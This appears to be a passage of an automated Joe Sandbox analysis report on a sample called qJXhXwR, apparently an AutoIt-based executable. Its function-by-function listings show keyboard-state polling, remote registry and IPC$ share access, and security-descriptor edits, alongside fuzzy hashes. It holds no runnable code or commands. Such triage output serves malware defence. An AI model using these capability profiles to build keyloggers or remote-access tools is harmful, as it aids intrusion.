GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 00007FF7A521751A
LoadStringW.USER32 ref: 00007FF7A521752C
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7A521766D
MessageBoxW.USER32 ref: 00007FF7A5217685

Strings

^ ERROR, xrefs: 00007FF7A52175F2
Error: , xrefs: 00007FF7A5217623
Line %d:, xrefs: 00007FF7A521758D
Line %d (File "%s"):, xrefs: 00007FF7A521757F
%s (%d) : ==> %s: %s %s, xrefs: 00007FF7A5217650

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: HandleLoadModuleString$Messagewprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 4051287042-2268648507
Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
Instruction ID: d69759d81513edea58c457abc9c90c97268e1e475cbce19411cefe2ba55468a8
Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
Instruction Fuzzy Hash: 8B515061B1AA4291EB01FB64E8414BDA361FF96F44FC21032EA4E536EEDE7CE506C750

Function 00007FF7A521D4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00007FF7A521D4B9
Sleep.KERNEL32 ref: 00007FF7A521D4D7
EnumThreadWindows.USER32 ref: 00007FF7A521D4FF
FindWindowExW.USER32 ref: 00007FF7A521D528
SetActiveWindow.USER32 ref: 00007FF7A521D54B
SendMessageW.USER32 ref: 00007FF7A521D55F

Part of subcall function 00007FF7A521B5D4: GetWindowThreadProcessId.USER32 ref: 00007FF7A521B608
Part of subcall function 00007FF7A521B5D4: GetCurrentThreadId.KERNEL32 ref: 00007FF7A521B610

SendMessageW.USER32 ref: 00007FF7A521D57F
Sleep.KERNEL32 ref: 00007FF7A521D58A
IsWindow.USER32 ref: 00007FF7A521D597
EndDialog.USER32 ref: 00007FF7A521D5AA

Part of subcall function 00007FF7A521B5D4: GetWindowThreadProcessId.USER32 ref: 00007FF7A521B5F0
Part of subcall function 00007FF7A521B5D4: GetCurrentThreadId.KERNEL32 ref: 00007FF7A521B5F8
Part of subcall function 00007FF7A521B5D4: AttachThreadInput.USER32 ref: 00007FF7A521B61D

Strings

BUTTON, xrefs: 00007FF7A521D51F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
String ID: BUTTON
API String ID: 3935177441-3405671355
Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
Instruction ID: 6a8d1ebaeca1bba05792a7233be2a4d1dc9084425234d02391990229be319a32
Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
Instruction Fuzzy Hash: DB3138B5B0B647C2F710BB20EC54676A261AF97F44FC75031E90E0AAF8CE2DA4848760

Function 00007FF7A51A15EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00007FF7A51A16C8
KillTimer.USER32 ref: 00007FF7A51A17A3
DestroyAcceleratorTable.USER32 ref: 00007FF7A51E9AB2

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Destroy$AcceleratorKillTableTimerWindow
String ID:
API String ID: 1974058525-0
Opcode ID: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
Instruction ID: b22606911aed6e45e3dbafd5e2178735ba2a48a678a1e5563ad133aa825ecab4
Opcode Fuzzy Hash: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
Instruction Fuzzy Hash: 5E914A65A0BA0685EB56AF51E890678A360EF86F84FDA4031DE4E477BCDF3CA440C370

Function 00007FF7A5212F78 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7A5212FB1
GetWindowRect.USER32 ref: 00007FF7A5212FCD
MoveWindow.USER32 ref: 00007FF7A5213048
GetDlgItem.USER32 ref: 00007FF7A5213063
GetWindowRect.USER32 ref: 00007FF7A5213078
MoveWindow.USER32 ref: 00007FF7A52130E2
GetDlgItem.USER32 ref: 00007FF7A52130F4
GetWindowRect.USER32 ref: 00007FF7A5213109
MoveWindow.USER32 ref: 00007FF7A521315B
GetDlgItem.USER32 ref: 00007FF7A5213173
MoveWindow.USER32 ref: 00007FF7A5213198
InvalidateRect.USER32 ref: 00007FF7A52131AB

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
Instruction ID: 8862aeb1939063ba90a1e4e55185c0545cb9e689d47835949414a862d250c9e2
Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
Instruction Fuzzy Hash: 6C61A1B2B152408BE714DF6AE84466DB7E2B799B84F518139DE0D93F98DF3CE9058B00

Function 00007FF7A5217E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32 ref: 00007FF7A5217F01
SetKeyboardState.USER32 ref: 00007FF7A5217F58
GetAsyncKeyState.USER32 ref: 00007FF7A5217F7E
GetKeyState.USER32 ref: 00007FF7A5217F93
GetAsyncKeyState.USER32 ref: 00007FF7A5217FC2
GetKeyState.USER32 ref: 00007FF7A5217FD2
GetAsyncKeyState.USER32 ref: 00007FF7A5218001
GetKeyState.USER32 ref: 00007FF7A5218011
GetAsyncKeyState.USER32 ref: 00007FF7A5218040
GetKeyState.USER32 ref: 00007FF7A5218050
GetAsyncKeyState.USER32 ref: 00007FF7A521807F
GetKeyState.USER32 ref: 00007FF7A521808F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
Instruction ID: 84620b3dc7996297a5925a6aff360bd103e3d965af6385e3ab387abf09b5b0f7
Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
Instruction Fuzzy Hash: 6C71B5B2A0E2C155EB35AB349C4027BAB60FB57F84FDA0039D68D032E9CE5DD9468735

Function 00007FF7A5224708 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 339COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32 ref: 00007FF7A5224795
GetDriveTypeW.KERNEL32 ref: 00007FF7A5224A03
wcscpy.LIBCMT ref: 00007FF7A5224AA7

Strings

cdrom, xrefs: 00007FF7A52247F7
removable, xrefs: 00007FF7A522484A
all, xrefs: 00007FF7A52247A0
unknown, xrefs: 00007FF7A522498F
fixed, xrefs: 00007FF7A5224890
network, xrefs: 00007FF7A52248EC
ramdisk, xrefs: 00007FF7A522493F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: BuffCharDriveLowerTypewcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 1561581874-1000479233
Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
Instruction ID: 94f632752a344eabccf1cd2abd719ffb94322db7b30c2b71b01cf5ba88582db8
Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
Instruction Fuzzy Hash: 5AD1F2B6E1A65681EA20BB15D8401BDE3A0FB56F94F820231DA5D53BFCDF3CE9458360

Function 00007FF7A520FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00007FF7A520FFAC
SendMessageTimeoutW.USER32 ref: 00007FF7A52100C8
GetClassNameW.USER32 ref: 00007FF7A521013C
GetDlgCtrlID.USER32 ref: 00007FF7A5210193
GetWindowRect.USER32 ref: 00007FF7A52101B9
GetParent.USER32 ref: 00007FF7A52101D6
ScreenToClient.USER32 ref: 00007FF7A52101E6
GetClassNameW.USER32 ref: 00007FF7A5210281
GetWindowTextW.USER32 ref: 00007FF7A52102C1

Strings

%s%u, xrefs: 00007FF7A5210044

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
String ID: %s%u
API String ID: 1412819556-679674701
Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
Instruction ID: 859db8655347b4e743d67086d0bc29c085f52078e159f371031c77ec8f1a1538
Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
Instruction Fuzzy Hash: 56B1D1B2B0A68297EB19EB21DC046FAA760FB46F84F810031DA09476E9DF3DF545C720

Function 00007FF7A521176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00007FF7A52117DA
GetWindowTextW.USER32 ref: 00007FF7A5211815
CharUpperBuffW.USER32 ref: 00007FF7A5211833
wcsstr.LIBVCRUNTIME ref: 00007FF7A5211866
GetClassNameW.USER32 ref: 00007FF7A521189C
GetWindowTextW.USER32 ref: 00007FF7A52118D0
GetClassNameW.USER32 ref: 00007FF7A521191B
GetClassNameW.USER32 ref: 00007FF7A5211951
GetWindowRect.USER32 ref: 00007FF7A52119CF

Strings

ThumbnailClass, xrefs: 00007FF7A52118A7, 00007FF7A5211926

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
String ID: ThumbnailClass
API String ID: 4010642439-1241985126
Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
Instruction ID: 80340a4870731778a733442bfc03219ddfd93f4f85b46caac9bc48544296def3
Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
Instruction Fuzzy Hash: 17A1C873B0964243EA25AB15DC446BAE761FB86B84F824035CA8E03AE9DF3DF505CB10

Function 00007FF7A51A1504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(?,?,00000000,?,?,00007FF7A51A12EF), ref: 00007FF7A51E99AC
ExtractIconExW.SHELL32 ref: 00007FF7A51E99CD
LoadImageW.USER32 ref: 00007FF7A51E99EB
ExtractIconExW.SHELL32 ref: 00007FF7A51E9A0C
SendMessageW.USER32 ref: 00007FF7A51E9A2F
DestroyIcon.USER32 ref: 00007FF7A51E9A3E
SendMessageW.USER32 ref: 00007FF7A51E9A64
DestroyIcon.USER32 ref: 00007FF7A51E9A73

Strings

P, xrefs: 00007FF7A51E99D3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: P
API String ID: 1268354404-3110715001
Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
Instruction ID: e9baedd5367b289c126d7f03c2d3a28ff9e737d11ed311f86401b1ceadee6f35
Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
Instruction Fuzzy Hash: 9161B276B0A6418AEB16EF25E840679A790FF86F98F950535EE0E437ACDF3CE4408750

Function 00007FF7A52234E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF7A522354D
LoadStringW.USER32 ref: 00007FF7A5223571
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7A52236CB
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7A52236E7

Strings

^ ERROR, xrefs: 00007FF7A522364A
"%s" (%d) : ==> %s:, xrefs: 00007FF7A52236D9
Error: , xrefs: 00007FF7A522367B
Line %d (File "%s"):, xrefs: 00007FF7A52235C0
"%s" (%d) : ==> %s:%s%s, xrefs: 00007FF7A52236B2

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: LoadStringwprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 3297454147-2391861430
Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
Instruction ID: 174d8a612f82c06c1c88e67018661ab159a66f0edcca1b4b95a66feb6a7f0ea2
Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
Instruction Fuzzy Hash: E2717262B1AA4292EB11FB61E8404FDA360FB96F44FC21032EA4D176EDDE7CE505C750

Function 00007FF7A520C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON

Download Yara Rule

APIs

WNetAddConnection2W.MPR ref: 00007FF7A520C143
RegConnectRegistryW.ADVAPI32 ref: 00007FF7A520C164
RegOpenKeyExW.ADVAPI32 ref: 00007FF7A520C193
RegQueryValueExW.ADVAPI32 ref: 00007FF7A520C1CD
CLSIDFromString.OLE32 ref: 00007FF7A520C1F4
RegCloseKey.ADVAPI32 ref: 00007FF7A520C203
RegCloseKey.ADVAPI32 ref: 00007FF7A520C20E

Strings

\IPC$, xrefs: 00007FF7A520C118
\CLSID, xrefs: 00007FF7A520C0A6
SOFTWARE\Classes\, xrefs: 00007FF7A520C088

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 3030280669-22481851
Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
Instruction ID: 24f9d1c2ec8a6c8b759ce8caf81e96300ff289c6e9dab05371b0ae57d45e41d4
Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
Instruction Fuzzy Hash: 1B51B66271AA8295EB11EB64F8806FDE7A0FB95B84F810031EA4D47ABDDF3CD585C710

Function 00007FF7A524AD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

MoveWindow.USER32 ref: 00007FF7A524AE48
CreateCompatibleDC.GDI32 ref: 00007FF7A524AE50
SendMessageW.USER32 ref: 00007FF7A524AE67
SelectObject.GDI32 ref: 00007FF7A524AE73
GetPixel.GDI32 ref: 00007FF7A524AE81
DeleteDC.GDI32 ref: 00007FF7A524AE8C
GetWindowLongW.USER32 ref: 00007FF7A524AE9A
SetLayeredWindowAttributes.USER32 ref: 00007FF7A524AEB4
DestroyWindow.USER32 ref: 00007FF7A524AEBE

Strings

static, xrefs: 00007FF7A524AD5D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
String ID: static
API String ID: 3821898125-2160076837
Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
Instruction ID: 0725dda9d147865b57f697beea1074f527984be490593d5cbce0fd2f25fd29c7
Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
Instruction Fuzzy Hash: BF417D7260978187EB609F25E844B5AB3A1FB8AB90F914235DA9D43BA8CF3DD444CB10

Function 00007FF7A520C858 Relevance: 16.7, APIs: 11, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A520CD34: GetUserObjectSecurity.USER32 ref: 00007FF7A520CD65
Part of subcall function 00007FF7A520CD34: GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7A520C65A), ref: 00007FF7A520CD71
Part of subcall function 00007FF7A520CD34: GetUserObjectSecurity.USER32 ref: 00007FF7A520CD9C

Part of subcall function 00007FF7A520CE28: InitializeSecurityDescriptor.ADVAPI32(?,?,00000000,00007FF7A520C66F), ref: 00007FF7A520CE4D

GetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF7A520C8E7
GetAclInformation.ADVAPI32 ref: 00007FF7A520C921
GetLengthSid.ADVAPI32 ref: 00007FF7A520C932
GetAce.ADVAPI32 ref: 00007FF7A520C970
AddAce.ADVAPI32 ref: 00007FF7A520C997
GetLengthSid.ADVAPI32 ref: 00007FF7A520C9AF
GetLengthSid.ADVAPI32 ref: 00007FF7A520C9D2
CopySid.ADVAPI32 ref: 00007FF7A520C9E1
AddAce.ADVAPI32 ref: 00007FF7A520CA27
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF7A520CA4B
SetUserObjectSecurity.USER32 ref: 00007FF7A520CA60

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1255039815-0
Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
Instruction ID: e938ad455bb7adb773d4a0d73429d91f9885edfc3fd2f4100e97b1769bd685dc
Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
Instruction Fuzzy Hash: 1E61D0A2B1665186EB00EF61CC505BDB7B4FB86F88B864135DE0A237E9DF39D805C360

Function 00007FF7A5217BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32 ref: 00007FF7A5217BD0
GetAsyncKeyState.USER32 ref: 00007FF7A5217C3F
GetKeyState.USER32 ref: 00007FF7A5217C54
GetAsyncKeyState.USER32 ref: 00007FF7A5217C6D
GetKeyState.USER32 ref: 00007FF7A5217C7D
GetAsyncKeyState.USER32 ref: 00007FF7A5217C97
GetKeyState.USER32 ref: 00007FF7A5217CA7
GetAsyncKeyState.USER32 ref: 00007FF7A5217CC1
GetKeyState.USER32 ref: 00007FF7A5217CD1
GetAsyncKeyState.USER32 ref: 00007FF7A5217CEB
GetKeyState.USER32 ref: 00007FF7A5217CFB

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
